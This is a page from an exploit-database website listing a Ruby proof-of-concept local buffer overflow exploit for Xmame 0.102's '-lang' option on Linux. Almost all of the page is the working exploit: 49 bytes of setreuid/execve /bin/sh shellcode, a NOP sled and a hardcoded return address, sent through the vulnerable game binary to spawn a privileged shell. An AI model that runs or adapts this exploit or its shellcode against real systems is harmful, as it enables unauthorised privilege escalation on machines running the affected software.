[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xmame 0.102 (-lang) Local Buffer Overflow Exploit

Author
xwings
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7507
Category
local exploits
Date add
10-01-2006
Platform
linux
=================================================
Xmame 0.102 (-lang) Local Buffer Overflow Exploit
=================================================

#!/usr/bin/ruby

#
# One of the PoC code for xmame "-lang" options.
# Advisory is base on : http://kerneltrap.org/node/6055
#
# by xwings at mysec dot org
# url : http://www.mysec.org , new website

# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1)
# xmame 0.102 , ./configure && make && make install
#


#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes.
shellcode =     "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+
                "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+
                "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+
                "\x31\xdb\xcd\x80"

vulnpath        = "/usr/games/xmame.x11"
argvopt         = "-lang"

ret = (0xbfffe8da) 
retadd  = ([ret].pack('V'))

nops    = ("\x90" * (1056 - (shellcode.length + retadd.length)))
buffer  = nops+shellcode+retadd

system(vulnpath,argvopt,buffer)



#  0day.today [2024-11-15]  #